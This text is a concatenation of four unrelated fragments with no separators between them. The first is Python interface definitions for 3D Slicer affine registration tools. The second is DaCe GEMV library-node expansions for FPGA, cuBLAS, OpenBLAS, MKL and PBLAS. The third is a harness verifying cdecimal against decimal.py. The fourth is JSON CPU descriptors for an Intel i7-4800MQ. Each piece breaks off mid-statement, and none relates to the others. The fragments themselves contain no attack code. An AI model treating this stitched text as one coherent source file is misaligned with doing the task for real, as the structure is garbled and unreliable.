(unitless). Consider smoothing the input data if there is considerable amounts of noise or the noise pattern in the fixed and moving images is very different.", argstr="--movingsmoothingfactor %d", ) histogrambins = traits.Int( desc="Number of histogram bins to use for Mattes Mutual Information. Reduce the number of bins if a registration fails. If the number of bins is too large, the estimated PDFs will be a field of impulses and will inhibit reliable registration estimation.", argstr="--histogrambins %d", ) spatialsamples = traits.Int( desc="Number of spatial samples to use in estimating Mattes Mutual Information. Larger values yield more accurate PDFs and improved registration quality.", argstr="--spatialsamples %d", ) iterations = traits.Int(desc="Number of iterations", argstr="--iterations %d") translationscale = traits.Float( desc="Relative scale of translations to rotations, i.e. a value of 100 means 10mm = 1 degree. (Actual scale used is 1/(TranslationScale^2)). This parameter is used to 'weight' or 'standardized' the transform parameters and their effect on the registration objective function.", argstr="--translationscale %f", ) initialtransform = File( desc="Initial transform for aligning the fixed and moving image. Maps positions in the fixed coordinate frame to positions in the moving coordinate frame. Optional.", exists=True, argstr="--initialtransform %s", ) FixedImageFileName = File( position=-2, desc="Fixed image to which to register", exists=True, argstr="%s" ) MovingImageFileName = File( position=-1, desc="Moving image", exists=True, argstr="%s" ) outputtransform = traits.Either( traits.Bool, File(), hash_files=False, desc="Transform calculated that aligns the fixed and moving image. Maps positions in the fixed coordinate frame to the moving coordinate frame. Optional (specify an output transform or an output volume or both).", argstr="--outputtransform %s", ) resampledmovingfilename = traits.Either( traits.Bool, File(), hash_files=False, desc="Resampled moving image to the fixed image coordinate frame. Optional (specify an output transform or an output volume or both).", argstr="--resampledmovingfilename %s", ) class AffineRegistrationOutputSpec(TraitedSpec): outputtransform = File( desc="Transform calculated that aligns the fixed and moving image. Maps positions in the fixed coordinate frame to the moving coordinate frame. Optional (specify an output transform or an output volume or both).", exists=True, ) resampledmovingfilename = File( desc="Resampled moving image to the fixed image coordinate frame. Optional (specify an output transform or an output volume or both).", exists=True, ) class AffineRegistration(SEMLikeCommandLine): """title: Affine Registration category: Legacy.Registration description: Registers two images together using an affine transform and mutual information. This module is often used to align images of different subjects or images of the same subject from different modalities. This module can smooth images prior to registration to mitigate noise and improve convergence. Many of the registration parameters require a working knowledge of the algorithm although the default parameters are sufficient for many registration tasks. version: 0.1.0.$Revision: 19608 $(alpha) documentation-url: http://wiki.slicer.org/slicerWiki/index.php/Documentation/4.1/Modules/AffineRegistration contributor: <NAME> (GE) acknowledgements: This module was developed by <NAME> while at GE Research with contributions from <NAME>. This work is part of the National Alliance for Medical Image Computing (NAMIC), funded by the National Institutes of Health through the NIH Roadmap for Medical Research, Grant U54 EB005149. """ input_spec = AffineRegistrationInputSpec output_spec = AffineRegistrationOutputSpec _cmd = "AffineRegistration " _outputs_filenames = { "resampledmovingfilename": "resampledmovingfilename.nii", "outputtransform": "outputtransform.txt", } class MultiResolutionAffineRegistrationInputSpec(CommandLineInputSpec): fixedImage = File( position=-2, desc="Image which defines the space into which the moving image is registered", exists=True, argstr="%s", ) movingImage = File( position=-1, desc="The transform goes from the fixed image's space into the moving image's space", exists=True, argstr="%s", ) resampledImage = traits.Either( traits.Bool, File(), hash_files=False, desc="Registration results", argstr="--resampledImage %s", ) saveTransform = traits.Either( traits.Bool, File(), hash_files=False, desc="Save the output transform from the registration", argstr="--saveTransform %s", ) fixedImageMask = File( desc="Label image which defines a mask of interest for the fixed image", exists=True, argstr="--fixedImageMask %s", ) fixedImageROI = traits.List( desc="Label image which defines a ROI of interest for the fixed image", argstr="--fixedImageROI %s", ) numIterations = traits.Int( desc="Number of iterations to run at each resolution level.", argstr="--numIterations %d", ) numLineIterations = traits.Int( desc="Number of iterations to run at each resolution level.", argstr="--numLineIterations %d", ) stepSize = traits.Float( desc="The maximum step size of the optimizer in voxels", argstr="--stepSize %f" ) stepTolerance = traits.Float( desc="The maximum step size of the optimizer in voxels", argstr="--stepTolerance %f", ) metricTolerance = traits.Float(argstr="--metricTolerance %f") class MultiResolutionAffineRegistrationOutputSpec(TraitedSpec): resampledImage = File(desc="Registration results", exists=True) saveTransform = File( desc="Save the output transform from the registration", exists=True ) class MultiResolutionAffineRegistration(SEMLikeCommandLine): """title: Robust Multiresolution Affine Registration category: Legacy.Registration description:
will be traversed in row-major order in order to bound the size of the output buffer to the tile size. The tile size on y must be larger than the latency of addition for the given data type. This expansion supports both transposed A and non-transposed A, but vectorization is only implemented for transposed A. """ # This corresponds to gemv_v2 in FBLAS environments = [] @staticmethod def expansion(node, state, sdfg, tile_size_x=None, tile_size_y=None): """ :param node: Node to expand. :param parent_state: State that the node is in. :param parent_sdfg: SDFG that the node is in. :param tile_size_x: Tile size along the dimension of the vector x. If set to None, no tiling is used, corresponding to setting the tile size equal to the full size of x. :param tile_size_y: Tile size along the dimension of the vector y. If set to None, no tiling is used, corresponding to setting the tile size equal to the full size of y. """ node.validate(sdfg, state) for e in state.in_edges(node): if e.dst_conn == "_A": desc_a = sdfg.arrays[e.data.data] elif e.dst_conn == "_x": desc_x = sdfg.arrays[e.data.data] for e in state.out_edges(node): if e.src_conn == "_y": desc_y = sdfg.arrays[e.data.data] sdfg = dace.SDFG("gemv") state = sdfg.add_state("gemv") alpha = node.alpha beta = node.beta # Create local versions of input data nodes desc_a = desc_a.clone() desc_a.transient = False sdfg.add_datadesc("_A", desc_a) desc_x = desc_x.clone() desc_x.transient = False sdfg.add_datadesc("_x", desc_x) desc_y = desc_y.clone() desc_y.transient = False sdfg.add_datadesc("_y", desc_y) if not node.transA and desc_a.dtype.veclen > 1: raise NotImplementedError( "Vectorization not implemented for non-transposed A.") # Create accesses read_a = state.add_read("_A") read_x = state.add_read("_x") if beta != 0: read_y = state.add_read("_y") write_y = state.add_write("_y") size_x = desc_x.shape[0] size_y = desc_y.shape[0] if tile_size_x is None: tile_size_x = size_x if tile_size_y is None: tile_size_y = size_y num_tiles_y = f"{size_y}/{tile_size_y}" num_tiles_x = f"{size_x}/{tile_size_x}" # Create y tile map y_tile_entry, y_tile_exit = state.add_map( "y_tiles", {"ty": f"0:{num_tiles_y}"}, schedule=dace.ScheduleType.FPGA_Device) # Create buffer sdfg.add_array("y_local", (tile_size_y, ), desc_y.dtype, storage=dace.StorageType.FPGA_Local, transient=True) y_local = state.add_access("y_local") y_local_write = state.add_access("y_local") # Initialize buffer init_entry, init_exit = state.add_map( "init", {"iy": f"0:{tile_size_y}"}, schedule=dace.ScheduleType.FPGA_Device) if beta != 0: if isinstance(desc_y, dt.Stream): subset = "0" else: subset = f"ty*{tile_size_y}+iy" init_tasklet = state.add_tasklet( "init", {"y_in"}, {"y_out"}, f"y_out = {desc_y.dtype.base_type.ctype}({beta}) * y_in") state.add_memlet_path(read_y, y_tile_entry, init_entry, init_tasklet, dst_conn="y_in", memlet=dace.Memlet(f"_y[{subset}]")) state.add_memlet_path(init_tasklet, init_exit, y_local, src_conn="y_out", memlet=dace.Memlet(f"y_local[iy]")) else: state.add_memlet_path(y_tile_entry, init_entry, memlet=dace.Memlet()) init_tasklet = state.add_tasklet("init", {}, {"y_out"}, "y_out = 0") state.add_memlet_path(init_entry, init_tasklet, memlet=dace.Memlet()) state.add_memlet_path(init_tasklet, init_exit, y_local, src_conn="y_out", memlet=dace.Memlet("y_local[iy]")) # Create x tile map x_tile_entry, x_tile_exit = state.add_map( "x_tiles", {"tx": f"0:{num_tiles_x}"}, schedule=dace.ScheduleType.FPGA_Device) # Create loop over tile size in x x_entry, x_exit = state.add_map("x", {"ix": f"0:{tile_size_x}"}, schedule=dace.ScheduleType.FPGA_Device) # Buffer a scalar value of x sdfg.add_array("x_local", (1, ), desc_x.dtype, transient=True, storage=dace.StorageType.FPGA_Local) x_local = state.add_access("x_local") subset = "0" if isinstance(desc_x, dt.Stream) else f"tx*{tile_size_x}+ix" state.add_memlet_path(read_x, y_tile_entry, x_tile_entry, x_entry, x_local, memlet=dace.Memlet(f"_x[{subset}]")) # Create loop over tile size in y y_entry, y_exit = state.add_map("y", {"iy": f"0:{tile_size_y}"}, schedule=dace.ScheduleType.FPGA_Device) # Do computation tasklet = state.add_tasklet("gemv", {"A_in", "x_in", "y_in"}, {"y_out"}, f"y_out = y_in + {alpha} * A_in * x_in") state.add_memlet_path(y_local, x_tile_entry, x_entry, y_entry, tasklet, dst_conn="y_in", memlet=dace.Memlet("y_local[iy]")) state.add_memlet_path(x_local, y_entry, tasklet, dst_conn="x_in", memlet=dace.Memlet("x_local[0]")) state.add_memlet_path(tasklet, y_exit, x_exit, x_tile_exit, y_local_write, src_conn="y_out", memlet=dace.Memlet("y_local[iy]")) if isinstance(desc_a, dt.Stream): subset = "0" elif node.transA: subset = f"tx * {tile_size_x} + ix, ty * {tile_size_y} + iy" else: subset = f"ty * {tile_size_y} + iy, tx * {tile_size_x} + ix" state.add_memlet_path(read_a, y_tile_entry, x_tile_entry, x_entry, y_entry, tasklet, dst_conn="A_in", memlet=dace.Memlet(f"_A[{subset}]")) # Write out tile of y write_y_entry, write_y_exit = state.add_map( "write_y", {"iy": f"0:{tile_size_y}"}, schedule=dace.ScheduleType.FPGA_Device) write_y_tasklet = state.add_tasklet("write_y", {"y_in"}, {"y_out"}, "y_out = y_in") subset = ("0" if isinstance(desc_y, dt.Stream) else f"ty * {tile_size_y} + iy") state.add_memlet_path(y_local_write, write_y_entry, write_y_tasklet, dst_conn="y_in", memlet=dace.Memlet("y_local[iy]")) state.add_memlet_path(write_y_tasklet, write_y_exit, y_tile_exit, write_y, src_conn="y_out", memlet=dace.Memlet(f"_y[{subset}]")) return sdfg @dace.library.expansion class ExpandGemvCuBLAS(ExpandTransformation): environments = [environments.cublas.cuBLAS] @staticmethod def expansion(node: 'Gemv', state, sdfg, m=None, n=None, **kwargs): node.validate(sdfg, state) ((edge_a, outer_array_a, shape_a, strides_a), (edge_x, outer_array_x, shape_x, strides_x), (edge_y, outer_array_y, shape_y, strides_y)) = _get_matmul_operands(node, state, sdfg, name_lhs="_A", name_rhs="_x", name_out="_y") dtype_a = outer_array_a.dtype.type dtype = outer_array_x.dtype.base_type veclen = outer_array_x.dtype.veclen m = m or node.m n = n or node.n if m is None: m = shape_y[0] if n is None: n = shape_x[0] transA = node.transA if strides_a[0] == 1: transA = not transA lda = strides_a[1] elif strides_a[1] == 1: lda = strides_a[0] else: warnings.warn('Matrix must be contiguous in at least ' 'one dimension. Falling back to pure expansion.') return ExpandGemvPure.expansion(node, state, sdfg, m=m, n=n, **kwargs) trans = 'CUBLAS_OP_N' if transA else 'CUBLAS_OP_T' if not node.transA: m, n = n, m if veclen != 1: warnings.warn('Vector GEMV not supported, falling back to pure') return ExpandGemvPure.expansion(node, state, sdfg, m=m, n=n, **kwargs) func, ctype, runtimetype = blas_helpers.cublas_type_metadata(dtype) func += 'gemv' # TODO: (alpha,beta) != (1,0) if node.alpha != 1.0 or node.beta != 0.0: raise NotImplementedError alpha = ( '__state->cublas_handle.Constants(__dace_cuda_device).%sPone()' % runtimetype) beta = ( '__state->cublas_handle.Constants(__dace_cuda_device).%sZero()' % runtimetype) code = (environments.cublas.cuBLAS.handle_setup_code(node) + f""" cublas{func}(__dace_cublas_handle, {trans}, {m}, {n}, {alpha}, _A, {lda}, _x, {strides_x[0]}, {beta}, _y, {strides_y[0]});""") tasklet = dace.sdfg.nodes.Tasklet(node.name, node.in_connectors, node.out_connectors, code, language=dace.dtypes.Language.CPP) return tasklet @dace.library.expansion class ExpandGemvOpenBLAS(ExpandTransformation): environments = [environments.openblas.OpenBLAS] @staticmethod def expansion(node: 'Gemv', state, sdfg, m=None, n=None, **kwargs): from dace.sdfg.scope import is_devicelevel_gpu if is_devicelevel_gpu(sdfg, state, node): return ExpandGemvPure.expansion(node, state, sdfg) node.validate(sdfg, state) ((edge_a, outer_array_a, shape_a, strides_a), (edge_x, outer_array_x, shape_x, strides_x), (edge_y, outer_array_y, shape_y, strides_y)) = _get_matmul_operands(node, state, sdfg, name_lhs="_A", name_rhs="_x", name_out="_y") dtype_a = outer_array_a.dtype.type dtype = outer_array_x.dtype.base_type veclen = outer_array_x.dtype.veclen m = m or node.m n = n or node.n if m is None: m = shape_y[0] if n is None: n = shape_x[0] transA = node.transA if strides_a[0] == 1: transA = not transA lda = strides_a[1] elif strides_a[1] == 1: lda = strides_a[0] else: warnings.warn('Matrix must be contiguous in at least ' 'one dimension. Falling back to pure expansion.') return ExpandGemvPure.expansion(node, state, sdfg, m=m, n=n, **kwargs) layout = 'CblasColMajor' trans = 'CblasNoTrans' if transA else 'CblasTrans' if not node.transA: m, n = n, m if veclen != 1: warnings.warn('Vector GEMV not supported, falling back to pure.') return ExpandGemvPure.expansion(node, state, sdfg, m=m, n=n, **kwargs) func, ctype, runtimetype = blas_helpers.cublas_type_metadata(dtype) func = func.lower() + 'gemv' code = f"""cblas_{func}({layout}, {trans}, {m}, {n}, {node.alpha}, _A, {lda}, _x, {strides_x[0]}, {node.beta}, _y, {strides_y[0]});""" tasklet = dace.sdfg.nodes.Tasklet(node.name, node.in_connectors, node.out_connectors, code, language=dace.dtypes.Language.CPP) return tasklet @dace.library.expansion class ExpandGemvMKL(ExpandTransformation): environments = [environments.intel_mkl.IntelMKL] @staticmethod def expansion(*args, **kwargs): return ExpandGemvOpenBLAS.expansion(*args, **kwargs) @dace.library.expansion class ExpandGemvPBLAS(ExpandTransformation): environments = [] @staticmethod def expansion(node: 'Gemv', state, sdfg, m=None, n=None, **kwargs): node.validate(sdfg, state) ((edge_a, outer_array_a, shape_a, strides_a), (edge_x, outer_array_x, shape_x, strides_x), (edge_y, outer_array_y, shape_y, strides_y)) = _get_matmul_operands(node, state, sdfg, name_lhs="_A", name_rhs="_x", name_out="_y") dtype_a = outer_array_a.dtype.type dtype = outer_array_x.dtype.base_type veclen = outer_array_x.dtype.veclen m = m or node.m n = n or node.n if m is None: m = shape_y[0] if n is None: n = shape_x[0] transA = node.transA Px = dace.symbol('Px', dtype=dace.int32, integer=True, positive=True) Py = dace.symbol('Py', dtype=dace.int32, integer=True, positive=True) try: sdfg.add_symbol('Px', dace.int32) sdfg.add_symbol('Py', dace.int32) except FileExistsError: pass @dace.program def _gemNv_pblas(_A: dtype[m, n], _x: dtype[n], _y: dtype[m]): lA = np.empty((m // Px, n // Py), dtype=_A.dtype) lx = np.empty((n // Px,), dtype=_x.dtype) dace.comm.BCScatter(_A, lA, (m//Px, n//Py)) dace.comm.BCScatter(_x, lx, (n//Px, 1)) ly = distr.MatMult(_A, _x, lA, lx, (m//Px, n//Py), (n//Px, 1)) dace.comm.BCGather(ly, _y, (m//Px, 1)) @dace.program def _gemTv_pblas(_A: dtype[m, n], _x: dtype[m], _y: dtype[n]): lA = np.empty((m // Px, n // Py), dtype=_A.dtype) lx = np.empty((m // Px,), dtype=_x.dtype) dace.comm.BCScatter(_A, lA, (m//Px, n//Py)) dace.comm.BCScatter(_x, lx, (m//Px, 1)) ly = distr.MatMult(_x, _A, lx, lA, (m//Px, 1), (m//Px, n//Py)) dace.comm.BCGather(ly, _y, (n//Px, 1)) # NOTE: The following is done to avoid scalar promotion, which results # in ValueError: Node type "BlockCyclicScatter" not supported for # promotion if transA: sdfg = _gemTv_pblas.to_sdfg(strict=False) else: sdfg = _gemNv_pblas.to_sdfg(strict=False) sdfg.apply_strict_transformations() return sdfg @dace.library.node class Gemv(dace.sdfg.nodes.LibraryNode): # Global properties implementations = { "pure": ExpandGemvPure, "OpenBLAS": ExpandGemvOpenBLAS, "MKL": ExpandGemvMKL, "cuBLAS": ExpandGemvCuBLAS, "FPGA_Accumulate": ExpandGemvFpgaAccumulate, "FPGA_TilesByColumn": ExpandGemvFpgaTilesByColumn, "PBLAS": ExpandGemvPBLAS } default_implementation = None # Object fields alpha = properties.SymbolicProperty(allow_none=False, default=1) beta = properties.SymbolicProperty(allow_none=False, default=0) transA = properties.Property( dtype=bool, desc="Whether to transpose A before multiplying") n = properties.SymbolicProperty(allow_none=True, default=None) m = properties.SymbolicProperty(allow_none=True, default=None) def __init__(self, name, location=None, transA=False, alpha=1, beta=0): super().__init__( name, location=location,
op1 = operands[0].dec op2 = operands[1].dec exact = getattr(op1, funcname)(op2, context=self.maxctx) # cdecimal's rounded result s = str(result.mpd) rounded = decimal.Decimal(s) self.ulpdiff += 1 return self.check_ulpdiff(exact, rounded) def resolve_underflow(self, result): """In extremely rare cases where the infinite precision result is just below etiny, cdecimal does not set Subnormal/Underflow. Example: setcontext(Context(prec=21, rounding=ROUND_UP, Emin=-55, Emax=85)) Decimal("1.00000000000000000000000000000000000000000000000" "0000000100000000000000000000000000000000000000000" "0000000000000025").ln() """ if str(result.mpd) != str(result.dec): return False # Results must be identical. if context.f.flags[cdecimal.Rounded] and \ context.f.flags[cdecimal.Inexact] and \ context.d.flags[decimal.Rounded] and \ context.d.flags[decimal.Inexact]: return True # Subnormal/Underflow may be missing. return False def exp(self, result, operands): if result.mpd.is_nan() or result.dec.is_nan(): return False if context.f._allcr: return self.resolve_underflow(result) return self.un_resolve_ulp(result, "exp", operands) def log10(self, result, operands): if result.mpd.is_nan() or result.dec.is_nan(): return False if context.f._allcr: return self.resolve_underflow(result) return self.un_resolve_ulp(result, "log10", operands) def ln(self, result, operands): if result.mpd.is_nan() or result.dec.is_nan(): return False if context.f._allcr: return self.resolve_underflow(result) return self.un_resolve_ulp(result, "ln", operands) def __pow__(self, result, operands): if operands[2] is not None: # three argument __pow__ # issue7049: third arg must fit into precision if (operands[0].mpd.is_zero() != operands[1].mpd.is_zero()): if (result.mpd == 0 or result.mpd == 1) and result.dec.is_nan(): if (not context.f.flags[cdecimal.InvalidOperation]) and \ context.d.flags[decimal.InvalidOperation]: self.powmod_zeros += 1 return True # issue7049: ideal exponent if decimal.Decimal(str(result.mpd)) == result.dec: return True elif result.mpd.is_nan() or result.dec.is_nan(): return False elif context.f.flags[cdecimal.Rounded] and \ context.f.flags[cdecimal.Inexact] and \ context.d.flags[decimal.Rounded] and \ context.d.flags[decimal.Inexact]: # decimal.py: correctly-rounded pow() return self.bin_resolve_ulp(result, "__pow__", operands) else: return False power = __pow__ def __radd__(self, result, operands): """decimal.py gives preference to the first nan""" if operands[0].mpd.is_nan() and operands[1].mpd.is_nan() and \ result.mpd.is_nan() and result.dec.is_nan(): return True return False __rmul__ = __radd__ # Fixed in 2.7.2. def plus(self, result, operands): """special cases for zero/ROUND_FLOOR""" if context.f.rounding == cdecimal.ROUND_FLOOR: if operands[0].mpd.is_zero(): return True return False minus = __neg__ = __pos__ = plus if py_minor <= 6: def rotate(self, result, operands): """truncate excess digits before the operation""" if len(operands[0].dec._int) > context.f.prec: return True return False shift = rotate def compare_total_mag(self, result, operands): """fixed in Python2.6.?""" if operands[0].mpd.is_nan() and operands[1].mpd.is_nan() and \ abs(result.mpd) == 1 and abs(result.dec) == 1: self.total_mag_nan += 1 return True return False compare_total = compare_total_mag def logb(self, result, operands): """fixed in Python2.6.?""" if context.f.flags[cdecimal.Rounded] and \ (not context.d.flags[decimal.Rounded]): self.logb_round_if_gt_prec += 1 return True return False def max(self, result, operands): if py_minor <= 5 or py_micro <= 1: # broken in multiple ways, fixed in 2.6.2 return True # hack, since is_nan() appears to be broken on the result if (not result.mpd.is_nan()) and 'sNaN' in result.dec.to_eng_string(): return True if context.f.flags[cdecimal.Subnormal] and \ (not context.d.flags[decimal.Subnormal]): self.max_status += 1 return True return False max_mag = max min = max min_mag = max class dHandlerObj(): """For non-decimal return values: Handle known disagreements between decimal.py and cdecimal.so.""" def __init__(self): pass def default(self, result, operands): return False __ge__ = __gt__ = __le__ = __lt__ = __str__ = __repr__ = default if py_minor >= 7: __ne__ = __eq__ = default if py_minor <= 6: def __eq__(self, result, operands): """cdecimal raises for all sNaN comparisons""" if operands[0].mpd.is_snan() or operands[1].mpd.is_snan(): return True return False __ne__ = __eq__ if py_minor <= 6: # Fixed in release26-maint, but a lot of distributed # versions do not have the fix yet. def is_normal(self, result, operands): # Issue7099 if operands[0].mpd.is_normal(): return True return False if py_minor <= 5: """decimal.py uses double quotes instead of single quotes.""" def __repr__(self, result, operands): return True dhandler_cdec = dHandlerCdec() def cdec_known_disagreement(result, funcname, operands): return getattr(dhandler_cdec, funcname, dhandler_cdec.default)(result, operands) dhandler_obj = dHandlerObj() def obj_known_disagreement(result, funcname, operands): return getattr(dhandler_obj, funcname, dhandler_obj.default)(result, operands) def verify(result, funcname, operands): """Verifies that after operation 'funcname' with operand(s) 'operands' result[0] and result[1] as well as the context flags have the same values.""" global EXIT_STATUS if result[0] != result[1] or not context.assert_eq_status(): if obj_known_disagreement(result, funcname, operands): return # skip known disagreements EXIT_STATUS = 1 raise CdecException(result, funcname, operands, str(context.f), str(context.d)) class cdec(object): """Joins cdecimal.so and decimal.py for redundant calculations with error checking.""" __slots__ = ['mpd', 'dec'] def __new__(cls, value=None): self = object.__new__(cls) self.mpd = None self.dec = None if value is not None: context.clear_status() if py_minor <= 6 and isinstance(value, float): self.mpd = cdecimal.Decimal.from_float(value) self.dec = decimal.Decimal.from_float(value) else: self.mpd = cdecimal.Decimal(value) self.dec = decimal_new(value) self.verify('__xnew__', (value,)) return self def verify(self, funcname, operands): """Verifies that after operation 'funcname' with operand(s) 'operands' self.mpd and self.dec as well as the context flags have the same values.""" global EXIT_STATUS mpdstr = str(self.mpd) decstr = str(self.dec) mpdstr_eng = self.mpd.to_eng_string() decstr_eng = self.dec.to_eng_string() mpd_tuple = self.mpd.as_tuple() dec_tuple = self.dec.as_tuple() if mpd_tuple != dec_tuple: # XXX if mpd_tuple[2] == 'F' and dec_tuple[2] == 'F' and \ mpd_tuple[1] == () and dec_tuple[1] == (0,): return if mpdstr != decstr or mpdstr_eng != decstr_eng or mpd_tuple != dec_tuple \ or not context.assert_eq_status(): if cdec_known_disagreement(self, funcname, operands): return # skip known disagreements EXIT_STATUS = 1 raise CdecException(self, funcname, operands, str(context.f), str(context.d)) def unaryfunc(self, funcname): "unary function returning a cdec" context.clear_status() c = cdec() c.mpd = getattr(self.mpd, funcname)() c.dec = getattr(self.dec, funcname)() c.verify(funcname, (self,)) return c def unaryfunc_ctx(self, funcname): "unary function returning a cdec, uses the context methods of decimal.py" context.clear_status() c = cdec() c.mpd = getattr(self.mpd, funcname)() c.dec = getattr(context.d, funcname)(self.dec) c.verify(funcname, (self,)) return c def obj_unaryfunc(self, funcname): "unary function returning an object other than a cdec" context.clear_status() r_mpd = getattr(self.mpd, funcname)() r_dec = getattr(self.dec, funcname)() verify((r_mpd, r_dec), funcname, (self,)) return r_mpd def binaryfunc(self, other, funcname): "binary function returning a cdec" context.clear_status() c = cdec() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec c.mpd = getattr(self.mpd, funcname)(other_mpd) c.dec = getattr(self.dec, funcname)(other_dec) c.verify(funcname, (self, other)) return c def binaryfunc_ctx(self, other, funcname): "binary function returning a cdec, uses the context methods of decimal.py" context.clear_status() c = cdec() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec c.mpd = getattr(self.mpd, funcname)(other_mpd) c.dec = getattr(context.d, funcname)(self.dec, other_dec) c.verify(funcname, (self, other)) return c def obj_binaryfunc(self, other, funcname): "binary function returning an object other than a cdec" context.clear_status() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec r_mpd = getattr(self.mpd, funcname)(other_mpd) r_dec = getattr(self.dec, funcname)(other_dec) verify((r_mpd, r_dec), funcname, (self, other)) return r_mpd def ternaryfunc(self, other, third, funcname): "ternary function returning a cdec" context.clear_status() c = cdec() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec third_mpd = third_dec = third if isinstance(third, cdec): third_mpd = third.mpd third_dec = third.dec c.mpd = getattr(self.mpd, funcname)(other_mpd, third_mpd) c.dec = getattr(self.dec, funcname)(other_dec, third_dec) c.verify(funcname, (self, other, third)) return c def __abs__(self): return self.unaryfunc('__abs__') def __add__(self, other): return self.binaryfunc(other, '__add__') def __copy__(self): return self.unaryfunc('__copy__') def __deepcopy__(self, memo=None): context.clear_status() c = cdec() c.mpd = self.mpd.__deepcopy__(memo) c.dec = self.dec.__deepcopy__(memo) c.verify('__deepcopy__', (self,)) return c def __div__(self, other): return self.binaryfunc(other, '__div__') def __divmod__(self, other): context.clear_status() q = cdec() r = cdec() other_mpd = other_dec = other if isinstance(other, cdec): other_mpd = other.mpd other_dec = other.dec q.mpd, r.mpd = self.mpd.__divmod__(other_mpd) q.dec, r.dec = self.dec.__divmod__(other_dec, context.d) q.verify('__divmod__', (self, other)) r.verify('__divmod__', (self, other)) return (q, r) def __eq__(self, other): return self.obj_binaryfunc(other, '__eq__') def __float__(self): if (self.mpd.is_nan() and self.dec.is_nan()): return float("NaN") try: return self.obj_unaryfunc('__float__') except ValueError: return None def __floordiv__(self, other): return self.binaryfunc(other, '__floordiv__') def __ge__(self, other): return self.obj_binaryfunc(other, '__ge__') def __gt__(self, other): return self.obj_binaryfunc(other, '__gt__') def __hash__(self): global PY25_HASH_HAVE_WARNED if self.mpd.is_snan() or (py_minor <= 6 and self.mpd.is_nan()): return None # for testing raise ValueError('Cannot hash a NaN value.') ret = None try: # Python 2.5 can use exorbitant amounts of memory ret = self.obj_unaryfunc('__hash__') except MemoryError: if not PY25_HASH_HAVE_WARNED: sys.stderr.write("Out of memory while hashing %s: upgrade to Python 2.6\n" % str(self.mpd)) PY25_HASH_HAVE_WARNED = 1 return ret def __int__(self): # ValueError or OverflowError if self.mpd.is_special(): return (None, None) return self.obj_unaryfunc('__int__') def __le__(self, other): return self.obj_binaryfunc(other, '__le__') def __long__(self): # ValueError or OverflowError if self.mpd.is_special(): return (None, None) return self.obj_unaryfunc('__long__') def __lt__(self, other): return self.obj_binaryfunc(other, '__lt__') def __mod__(self, other): return self.binaryfunc(other, '__mod__') def __mul__(self, other): return self.binaryfunc(other, '__mul__') def __ne__(self, other): return self.obj_binaryfunc(other, '__ne__') def __neg__(self):
"stepping": "3", "mhz": "3419.000", "cache_size": "6144 KB", "physical_id": "0", "core_id": "2", "cores": "4", "flags": [ "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "clflush", "dts", "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht", "tm", "pbe", "syscall", "nx", "pdpe1gb", "rdtscp", "lm", "constant_tsc", "arch_perfmon", "pebs", "bts", "rep_good", "nopl", "xtopology", "nonstop_tsc", "aperfmperf", "eagerfpu", "pni", "pclmulqdq", "dtes64", "monitor", "ds_cpl", "vmx", "smx", "est", "tm2", "ssse3", "sdbg", "fma", "cx16", "xtpr", "pdcm", "pcid", "sse4_1", "sse4_2", "x2apic", "movbe", "popcnt", "tsc_deadline_timer", "aes", "xsave", "avx", "f16c", "rdrand", "lahf_lm", "abm", "epb", "tpr_shadow", "vnmi", "flexpriority", "ept", "vpid", "fsgsbase", "tsc_adjust", "bmi1", "avx2", "smep", "bmi2", "erms", "invpcid", "xsaveopt", "dtherm", "ida", "arat", "pln", "pts" ] }, "5": { "vendor_id": "GenuineIntel", "family": "6", "model": "60", "model_name": "Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz", "stepping": "3", "mhz": "2752.569", "cache_size": "6144 KB", "physical_id": "0", "core_id": "2", "cores": "4", "flags": [ "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "clflush", "dts", "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht", "tm", "pbe", "syscall", "nx", "pdpe1gb", "rdtscp", "lm", "constant_tsc", "arch_perfmon", "pebs", "bts", "rep_good", "nopl", "xtopology", "nonstop_tsc", "aperfmperf", "eagerfpu", "pni", "pclmulqdq", "dtes64", "monitor", "ds_cpl", "vmx", "smx", "est", "tm2", "ssse3", "sdbg", "fma", "cx16", "xtpr", "pdcm", "pcid", "sse4_1", "sse4_2", "x2apic", "movbe", "popcnt", "tsc_deadline_timer", "aes", "xsave", "avx", "f16c", "rdrand", "lahf_lm", "abm", "epb", "tpr_shadow", "vnmi", "flexpriority", "ept", "vpid", "fsgsbase", "tsc_adjust", "bmi1", "avx2", "smep", "bmi2", "erms", "invpcid", "xsaveopt", "dtherm", "ida", "arat", "pln", "pts" ] }, "6": { "vendor_id": "GenuineIntel", "family": "6", "model": "60", "model_name": "Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz", "stepping": "3", "mhz": "2953.619", "cache_size": "6144 KB", "physical_id": "0", "core_id": "3", "cores": "4", "flags": [ "fpu", "vme", "de", "pse", "tsc", "msr", "pae", "mce", "cx8", "apic", "sep", "mtrr", "pge", "mca", "cmov", "pat", "pse36", "clflush", "dts", "acpi", "mmx", "fxsr", "sse", "sse2", "ss", "ht", "tm", "pbe", "syscall", "nx", "pdpe1gb", "rdtscp", "lm", "constant_tsc", "arch_perfmon", "pebs", "bts", "rep_good", "nopl", "xtopology", "nonstop_tsc", "aperfmperf", "eagerfpu", "pni", "pclmulqdq", "dtes64", "monitor", "ds_cpl", "vmx", "smx", "est", "tm2", "ssse3", "sdbg", "fma", "cx16", "xtpr", "pdcm", "pcid", "sse4_1", "sse4_2", "x2apic", "movbe", "popcnt", "tsc_deadline_timer", "aes", "xsave", "avx", "f16c", "rdrand", "lahf_lm", "abm", "epb", "tpr_shadow", "vnmi", "flexpriority", "ept", "vpid", "fsgsbase", "tsc_adjust", "bmi1", "avx2", "smep", "bmi2", "erms", "invpcid", "xsaveopt", "dtherm", "ida", "arat", "pln", "pts" ] }, "7": { "vendor_id": "GenuineIntel", "family": "6", "model": "60", "model_name": "Intel(R) Core(TM) i7-4800MQ CPU @ 2.70GHz", "stepping": "3", "mhz": "2927.087", 